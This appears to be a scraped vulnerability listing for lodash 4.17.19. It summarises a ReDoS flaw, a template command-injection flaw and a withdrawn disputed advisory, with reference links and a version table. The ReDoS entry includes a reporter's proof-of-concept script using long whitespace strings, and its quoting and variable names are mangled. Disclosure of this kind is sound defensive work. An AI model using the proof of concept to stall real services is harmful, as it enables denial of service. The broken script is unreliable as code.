NodeJS/lodash/4.17.19
Lodash modular utilities.
https://www.npmjs.com/package/lodash
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service (ReDoS) in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2020-28500
- https://github.com/lodash/lodash/pull/5065
- https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1018905
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://github.com/advisories/GHSA-29mw-wpgm-hmr9
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber
, trim
and trimEnd
functions.
Steps to reproduce (provided by reporter Liyuan Chen): ```js var lo = require('lodash');
function buildblank(n) {
var ret = 1
for (var i = 0; i < n; i++) {
ret += "
}
return ret +
1";
}
var s = buildblank(50000) var time0 = Date.now();
lo.trim(s)
var timecost0 = Date.now() - time0;
console.log("timecost0: + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log(
timecost1: " + timecost1);
var time2 = Date.now();
lo.trimEnd(s);
var timecost2 = Date.now() - time2;
console.log("timecost2: " + time_cost2);
```
Command Injection in lodash
- https://nvd.nist.gov/vuln/detail/CVE-2021-23337
- https://github.com/advisories/GHSA-35jh-r3h4-6jhm
- https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
- https://security.netapp.com/advisory/ntap-20210312-0006/
- https://snyk.io/vuln/SNYK-JS-LODASH-1040724
- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851
- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- https://security.netapp.com/advisory/ntap-20210312-0006
lodash
versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Withdrawn: Arbitrary code execution in lodash
Withdrawn
GitHub has chosen to publish this CVE as a withdrawn advisory due to it not being a security issue. See this issue for more details.
CVE description
"** DISPUTED ** A command injection vulnerability in Lodash 4.17.21 allows attackers to achieve arbitrary code execution via the template function. This is a different parameter, method, and version than CVE-2021-23337. NOTE: the vendor's position is that it's the developer's responsibility to ensure that a template does not evaluate code that originates from untrusted input.
114 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
0.5.2 | MIT | 9 | 2012-08-22 - 16:22 | over 11 years |
0.5.1 | MIT | 9 | 2012-08-18 - 20:15 | over 11 years |
0.5.0 | MIT | 9 | 2012-08-17 - 20:13 | over 11 years |
0.5.0-rc.1 | MIT | 9 | 2012-08-07 - 15:08 | almost 12 years |
0.4.2 | MIT | 9 | 2012-07-16 - 18:49 | almost 12 years |
0.4.1 | MIT | 9 | 2012-07-12 - 04:56 | almost 12 years |
0.4.0 | MIT | 9 | 2012-07-11 - 17:14 | almost 12 years |
0.3.2 | MIT | 9 | 2012-06-14 - 19:19 | almost 12 years |
0.3.1 | MIT | 9 | 2012-06-11 - 04:12 | almost 12 years |
0.3.0 | MIT | 9 | 2012-06-06 - 20:01 | almost 12 years |
0.2.2 | MIT | 9 | 2012-05-30 - 07:56 | almost 12 years |
0.2.1 | MIT | 9 | 2012-05-24 - 21:53 | almost 12 years |
0.2.0 | MIT | 9 | 2012-05-22 - 04:06 | almost 12 years |
0.1.0 | MIT | 9 | 2012-04-23 - 16:37 | about 12 years |